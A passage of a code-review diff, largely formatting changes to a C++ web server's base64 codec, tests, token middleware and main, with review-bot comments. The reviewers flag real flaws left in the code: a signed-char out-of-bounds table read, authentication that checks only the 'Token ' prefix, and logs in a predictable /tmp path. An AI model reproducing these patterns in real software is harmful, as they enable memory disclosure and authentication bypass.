- for (unsigned int i = 0; i < input_length; i++) {
- int base64code0 = 0;
- int base64code1 = 0;
- int base64code2 = 0;
- int base64code3 = 0;
-
- base64code0 = (input[i] >> 2) & 0x3f; // 1-byte 6 bits
- output += encoding_data[base64code0];
- base64code1 = (input[i] << 4) & 0x3f; // 1-byte 2 bits +
-
- if (++i < input_length) {
- base64code1 |= (input[i] >> 4) & 0x0f; // 2-byte 4 bits
- output += encoding_data[base64code1];
- base64code2 = (input[i] << 2) & 0x3f; // 2-byte 4 bits +
-
- if (++i < input_length) {
- base64code2 |= (input[i] >> 6) & 0x03; // 3-byte 2 bits
- base64code3 = input[i] & 0x3f; // 3-byte 6 bits
- output += encoding_data[base64code2];
- output += encoding_data[base64code3];
- } else {
- output += encoding_data[base64code2];
- output += '=';
- }
- } else {
- output += encoding_data[base64code1];
- output += '=';
- output += '=';
- }
+namespace base64 {
+bool base64_encode(const gsl::cstring_span<> &input, std::string &output) {
+ static const char encoding_data[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
+
+ unsigned int input_length = input.size();
+
+ // allocate space for output string
+ output.clear();
+ output.reserve(((input_length + 2) / 3) * 4);
+
+ // for each 3-bytes sequence from the input, extract 4 6-bits sequences and
+ // encode using
+ // encoding_data lookup table.
+ // if input do not contains enough chars to complete 3-byte sequence,use pad
+ // char '='
+ for (unsigned int i = 0; i < input_length; i++) {
+ int base64code0 = 0;
+ int base64code1 = 0;
+ int base64code2 = 0;
+ int base64code3 = 0;
+
+ base64code0 = (input[i] >> 2) & 0x3f; // 1-byte 6 bits
+ output += encoding_data[base64code0];
+ base64code1 = (input[i] << 4) & 0x3f; // 1-byte 2 bits +
+
+ if (++i < input_length) {
+ base64code1 |= (input[i] >> 4) & 0x0f; // 2-byte 4 bits
+ output += encoding_data[base64code1];
+ base64code2 = (input[i] << 2) & 0x3f; // 2-byte 4 bits +
+
+ if (++i < input_length) {
+ base64code2 |= (input[i] >> 6) & 0x03; // 3-byte 2 bits
+ base64code3 = input[i] & 0x3f; // 3-byte 6 bits
+ output += encoding_data[base64code2];
+ output += encoding_data[base64code3];
+ } else {
+ output += encoding_data[base64code2];
+ output += '=';
+ }
+ } else {
+ output += encoding_data[base64code1];
+ output += '=';
+ output += '=';
 }
+ }
- return true;
+ return true;
 }
-
-bool base64_decode(const gsl::cstring_span<> &input, std::string &output)
-{
+bool base64_decode(const gsl::cstring_span<> &input, std::string &output) {
 static const char nop = -1;
 static const char decoding_data[] = {
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, 62, nop,
- nop, nop, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, nop, nop,
- nop, nop, nop, nop, nop, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
- 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
- 25, nop, nop, nop, nop, nop, nop, 26, 27, 28, 29, 30, 31, 32, 33,
- 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48,
- 49, 50, 51, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
- nop};
+ nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
+ nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, 62, nop, nop, nop, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
+ nop, nop, nop, nop, nop, nop, nop, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
+ 22, 23, 24, 25, nop, nop, nop, nop, nop, nop, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44,
+ 45, 46, 47, 48, 49, 50, 51, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
+ nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
+ nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
+ nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop,
+ nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop};
 unsigned int input_length = input.size();
@@ -90,29 +76,29 @@ bool base64_decode(const gsl::cstring_span<> &input, std::string &output)
 for (unsigned int i = 0; i < input_length; i++) {
 char base64code0;
 char base64code1;
- char base64code2 = 0; // initialized to 0 to suppress warnings
+ char base64code2 = 0; // initialized to 0 to suppress warnings
 char base64code3;
 base64code0 = decoding_data[static_cast<int>(input[i])];
- if (base64code0 == nop) // non base64 character
+ if (base64code0 == nop) // non base64 character
 return false;
- if (!(++i < input_length)) // we need at least two input bytes for first
- // byte output
+ if (!(++i < input_length)) // we need at least two input bytes for first
+ // byte output
 return false;
 base64code1 = decoding_data[static_cast<int>(input[i])];
- if (base64code1 == nop) // non base64 character
+ if (base64code1 == nop) // non base64 character
 return false;
 output += ((base64code0 << 2) | ((base64code1 >> 4) & 0x3));
 if (++i < input_length) {
 char c = input[i];
- if (c == '=') { // padding , end of input
+ if (c == '=') { // padding , end of input
 assert((base64code1 & 0x0f) == 0);
 return true;
 }
 base64code2 = decoding_data[static_cast<int>(input[i])];
- if (base64code2 == nop) // non base64 character
+ if (base64code2 == nop) // non base64 character
 return false;
 output += ((base64code1 << 4) & 0xf0) | ((base64code2 >> 2) & 0x0f);
@@ -120,12 +106,12 @@ bool base64_decode(const gsl::cstring_span<> &input, std::string &output)
 if (++i < input_length) {
 char c = input[i];
- if (c == '=') { // padding , end of input
+ if (c == '=') { // padding , end of input
 assert((base64code2 & 0x03) == 0);
 return true;
 }
 base64code3 = decoding_data[static_cast<int>(input[i])];
- if (base64code3 == nop) // non base64 character
+ if (base64code3 == nop) // non base64 character
 return false;
 output += (((base64code2 << 6) & 0xc0) | base64code3);
@@ -134,5 +120,4 @@ bool base64_decode(const gsl::cstring_span<> &input, std::string &output)
 return true;
 }
-
 }
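Review bot: `decoding_data[static_cast<int>(input[i])]` indexes the 256-entry table with a `char` that is signed on common targets, so any input byte of 0x80 or above becomes a negative index and reads memory before the array; casting through the unsigned type first, `decoding_data[static_cast<unsigned char>(input[i])]` at all four lookups, keeps every byte in range. The NaughtyStrings test round-trips only the encoder's own output, so this path is never exercised by the suite. The two `assert(...)` checks on the padding bits abort the process on non-canonical but otherwise well-formed input in debug builds and disappear under NDEBUG; since the decoder reports other malformed input with `return false`, the same response there would be more consistent. base64_decode's body begins above this hunk.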
\ No newline at end of file
diff --git a/src/base64_test.cpp b/src/base64_test.cpp
index 3484976034..2758dfa80f 100644
--- a/src/base64_test.cpp
+++ b/src/base64_test.cpp
@@ -1,62 +1,58 @@
 #include "base64.hpp"
-#include "gtest/gtest.h"
 #include "big_list_of_naughty_strings.hpp"
+#include "gtest/gtest.h"
 // Tests that Base64 basic strings work
-TEST(Base64, EncodeBasicString)
-{
- std::string output;
- EXPECT_TRUE(base64::base64_encode("Foo", output));
+TEST(Base64, EncodeBasicString) {
+ std::string output;
+ EXPECT_TRUE(base64::base64_encode("Foo", output));
 }
 // Tests the test vectors available in the base64 spec
-TEST(Base64, EncodeRFC4648)
-{
- std::string output;
- EXPECT_TRUE(base64::base64_encode("", output));
- EXPECT_EQ(output, "");
- EXPECT_TRUE(base64::base64_encode("f", output));
- EXPECT_EQ(output, "Zg==");
- EXPECT_TRUE(base64::base64_encode("fo", output));
- EXPECT_EQ(output, "Zm8=");
- EXPECT_TRUE(base64::base64_encode("foo", output));
- EXPECT_EQ(output, "Zm9v");
- EXPECT_TRUE(base64::base64_encode("foob", output));
- EXPECT_EQ(output, "Zm9vYg==");
- EXPECT_TRUE(base64::base64_encode("fooba", output));
- EXPECT_EQ(output, "Zm9vYmE=");
- EXPECT_TRUE(base64::base64_encode("foobar", output));
- EXPECT_EQ(output, "Zm9vYmFy");
+TEST(Base64, EncodeRFC4648) {
+ std::string output;
+ EXPECT_TRUE(base64::base64_encode("", output));
+ EXPECT_EQ(output, "");
+ EXPECT_TRUE(base64::base64_encode("f", output));
+ EXPECT_EQ(output, "Zg==");
+ EXPECT_TRUE(base64::base64_encode("fo", output));
+ EXPECT_EQ(output, "Zm8=");
+ EXPECT_TRUE(base64::base64_encode("foo", output));
+ EXPECT_EQ(output, "Zm9v");
+ EXPECT_TRUE(base64::base64_encode("foob", output));
+ EXPECT_EQ(output, "Zm9vYg==");
+ EXPECT_TRUE(base64::base64_encode("fooba", output));
+ EXPECT_EQ(output, "Zm9vYmE=");
+ EXPECT_TRUE(base64::base64_encode("foobar", output));
+ EXPECT_EQ(output, "Zm9vYmFy");
 }
 // Tests the test vectors available in the base64 spec
-TEST(Base64, DecodeRFC4648)
-{
- std::string output;
- EXPECT_TRUE(base64::base64_decode("", output));
- EXPECT_EQ(output, "");
- EXPECT_TRUE(base64::base64_decode("Zg==", output));
- EXPECT_EQ(output, "f");
- EXPECT_TRUE(base64::base64_decode("Zm8=", output));
- EXPECT_EQ(output, "fo");
- EXPECT_TRUE(base64::base64_decode("Zm9v", output));
- EXPECT_EQ(output, "foo");
- EXPECT_TRUE(base64::base64_decode("Zm9vYg==", output));
- EXPECT_EQ(output, "foob");
- EXPECT_TRUE(base64::base64_decode("Zm9vYmE=", output));
- EXPECT_EQ(output, "fooba");
- EXPECT_TRUE(base64::base64_decode("Zm9vYmFy", output));
- EXPECT_EQ(output, "foobar");
+TEST(Base64, DecodeRFC4648) {
+ std::string output;
+ EXPECT_TRUE(base64::base64_decode("", output));
+ EXPECT_EQ(output, "");
+ EXPECT_TRUE(base64::base64_decode("Zg==", output));
+ EXPECT_EQ(output, "f");
+ EXPECT_TRUE(base64::base64_decode("Zm8=", output));
+ EXPECT_EQ(output, "fo");
+ EXPECT_TRUE(base64::base64_decode("Zm9v", output));
+ EXPECT_EQ(output, "foo");
+ EXPECT_TRUE(base64::base64_decode("Zm9vYg==", output));
+ EXPECT_EQ(output, "foob");
+ EXPECT_TRUE(base64::base64_decode("Zm9vYmE=", output));
+ EXPECT_EQ(output, "fooba");
+ EXPECT_TRUE(base64::base64_decode("Zm9vYmFy", output));
+ EXPECT_EQ(output, "foobar");
 }
 // Tests using pathalogical cases for all escapings
-TEST(Base64, NaugtyStrings){
- std::string base64_string;
- std::string decoded_string;
- for (auto& str: naughty_strings){
- EXPECT_TRUE(base64::base64_encode(str, base64_string));
- EXPECT_TRUE(base64::base64_decode(base64_string, decoded_string));
- EXPECT_EQ(str, decoded_string);
- }
+TEST(Base64, NaugtyStrings) {
+ std::string base64_string;
+ std::string decoded_string;
+ for (auto& str : naughty_strings) {
+ EXPECT_TRUE(base64::base64_encode(str, base64_string));
+ EXPECT_TRUE(base64::base64_decode(base64_string, decoded_string));
+ EXPECT_EQ(str, decoded_string);
+ }
 }
-
diff --git a/src/token_authorization_middleware.cpp b/src/token_authorization_middleware.cpp
index d1972fadf1..aeef58c6a9 100644
--- a/src/token_authorization_middleware.cpp
+++ b/src/token_authorization_middleware.cpp
@@ -4,49 +4,38 @@
 #include <token_authorization_middleware.hpp>
-namespace crow
-{
- std::string TokenAuthorizationMiddleware::context::get_cookie(const std::string& key)
- {
- if (cookie_sessions.count(key))
- return cookie_sessions[key];
- return {};
- }
-
- void TokenAuthorizationMiddleware::context::set_cookie(const std::string& key, const std::string& value)
- {
- cookies_to_push_to_client.emplace(key, value);
- }
-
-
- void TokenAuthorizationMiddleware::before_handle(crow::request& req, response& res, context& ctx)
- {
- auto return_unauthorized = [&req, &res](){
- res.code = 401;
- res.end();
- };
- if (req.url == "/login"){
-
- }
- // Check for an authorization header, reject if not present
- if (req.headers.count("Authorization") != 1) {
- return_unauthorized();
- return;
- }
-
- std::string auth_header = req.get_header_value("Authorization");
- // If the user is attempting any kind of auth other than token, reject
- if (!boost::starts_with(auth_header, "Token ")) {
- return_unauthorized();
- return;
- }
- }
-
- void TokenAuthorizationMiddleware::after_handle(request& /*req*/, response& res, context& ctx)
- {
- for (auto& cookie : ctx.cookies_to_push_to_client) {
- res.add_header("Set-Cookie", cookie.first + "=" + cookie.second);
- }
- }
-
+namespace crow {
+std::string TokenAuthorizationMiddleware::context::get_cookie(const std::string& key) {
+ if (cookie_sessions.count(key)) return cookie_sessions[key];
+ return {};
+}
+
+void TokenAuthorizationMiddleware::context::set_cookie(const std::string& key, const std::string& value) { cookies_to_push_to_client.emplace(key, value); }
+
+void TokenAuthorizationMiddleware::before_handle(crow::request& req, response& res, context& ctx) {
+ auto return_unauthorized = [&req, &res]() {
+ res.code = 401;
+ res.end();
+ };
+ if (req.url == "/login") {
+ }
+ // Check for an authorization header, reject if not present
+ if (req.headers.count("Authorization") != 1) {
+ return_unauthorized();
+ return;
+ }
+
+ std::string auth_header = req.get_header_value("Authorization");
+ // If the user is attempting any kind of auth other than token, reject
+ if (!boost::starts_with(auth_header, "Token ")) {
+ return_unauthorized();
+ return;
+ }
+}
+
+void TokenAuthorizationMiddleware::after_handle(request& /*req*/, response& res, context& ctx) {
+ for (auto& cookie : ctx.cookies_to_push_to_client) {
+ res.add_header("Set-Cookie", cookie.first + "=" + cookie.second);
+ }
+}
 }
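Review bot: The prefix test `boost::starts_with(auth_header, "Token ")` is the only check before_handle applies to the Authorization header; the value after the prefix is never compared against `ctx.cookie_sessions` or any other store, so as written the middleware verifies the header's shape rather than the caller, and that gap deserves an explicit marker such as `// TODO: validate the token value against the session store; only the prefix is checked here` until the lookup exists. The empty `if (req.url == "/login") { }` block just above it is dead code that reads as an unfinished login exemption and should be implemented or removed. get_cookie performs two lookups (`count` followed by `operator[]`) where a single `find` with an end check would do, and the `ctx` parameter of before_handle is unused.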
\ No newline at end of file
diff --git a/src/token_authorization_middleware_test.cpp b/src/token_authorization_middleware_test.cpp
index 39a12cd546..aef33e35a7 100644
--- a/src/token_authorization_middleware_test.cpp
+++ b/src/token_authorization_middleware_test.cpp
@@ -2,27 +2,23 @@
 #include <crow/app.h>
 #include "gtest/gtest.h"
-
 // Tests that Base64 basic strings work
-TEST(Authentication, TestBasicReject)
-{
- /*
- crow::App<crow::TokenAuthorizationMiddleware> app;
- crow::request req;
- crow::response res;
- app.handle(req, res);
- ASSERT_EQ(res.code, 400);
+TEST(Authentication, TestBasicReject) {
+ /*
+ crow::App<crow::TokenAuthorizationMiddleware> app;
+ crow::request req;
+ crow::response res;
+ app.handle(req, res);
+ ASSERT_EQ(res.code, 400);
- crow::App<crow::TokenAuthorizationMiddleware> app;
- decltype(app)::server_t server(&app, "127.0.0.1", 45451);
- CROW_ROUTE(app, "/")([&](const crow::request& req)
- {
- app.get_context<NullMiddleware>(req);
- app.get_context<NullSimpleMiddleware>(req);
- return "";
- });
- */
+ crow::App<crow::TokenAuthorizationMiddleware> app;
+ decltype(app)::server_t server(&app, "127.0.0.1", 45451);
+ CROW_ROUTE(app, "/")([&](const crow::request& req)
+ {
+ app.get_context<NullMiddleware>(req);
+ app.get_context<NullSimpleMiddleware>(req);
+ return "";
+ });
+ */
 }
-
-
diff --git a/src/webserver_main.cpp b/src/webserver_main.cpp
index 6c92e34737..32c5d35067 100644
--- a/src/webserver_main.cpp
+++ b/src/webserver_main.cpp
@@ -22,8 +22,8 @@
 #include "crow/websocket.h"
 #include "color_cout_g3_sink.hpp"
-#include "webassets.hpp"
 #include "token_authorization_middleware.hpp"
+#include "webassets.hpp"
 #include <iostream>
 #include <string>
@@ -31,25 +31,23 @@
 #include <webassets.hpp>
-int main(int argc, char** argv)
-{
- auto worker = g3::LogWorker::createLogWorker();
- auto handle = worker->addDefaultLogger(argv[0], "/tmp/");
- g3::initializeLogging(worker.get());
- auto log_file_name = handle->call(&g3::FileSink::fileName);
- auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(),
- &crow::ColorCoutSink::ReceiveLogMessage);
+int main(int argc, char** argv) {
+ auto worker = g3::LogWorker::createLogWorker();
+ auto handle = worker->addDefaultLogger(argv[0], "/tmp/");
+ g3::initializeLogging(worker.get());
+ auto log_file_name = handle->call(&g3::FileSink::fileName);
+ auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(), &crow::ColorCoutSink::ReceiveLogMessage);
- LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n";
+ LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n";
- std::string ssl_pem_file("server.pem");
- ensuressl::ensure_openssl_key_present_and_valid(ssl_pem_file);
+ std::string ssl_pem_file("server.pem");
+ ensuressl::ensure_openssl_key_present_and_valid(ssl_pem_file);
- crow::App<crow::TokenAuthorizationMiddleware> app;
+ crow::App<crow::TokenAuthorizationMiddleware> app;
- crow::webassets::request_routes(app);
+ crow::webassets::request_routes(app);
- crow::logger::setLogLevel(crow::LogLevel::DEBUG);
+ crow::logger::setLogLevel(crow::LogLevel::DEBUG);
- app.port(18080).run();
+ app.port(18080).run();
 } |
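Review bot: `worker->addDefaultLogger(argv[0], "/tmp/")` places the log file in a world-writable directory under a name derived from `argv[0]`, so any local user can pre-create or symlink the predictable path before the service starts; a service-owned directory, or a path taken from configuration, avoids that class of problem. The key file is likewise the relative `std::string ssl_pem_file("server.pem")`, so the private key is written to or read from whatever working directory the process happens to start in, which is worth pinning to an explicit location as well. main is complete within this hunk.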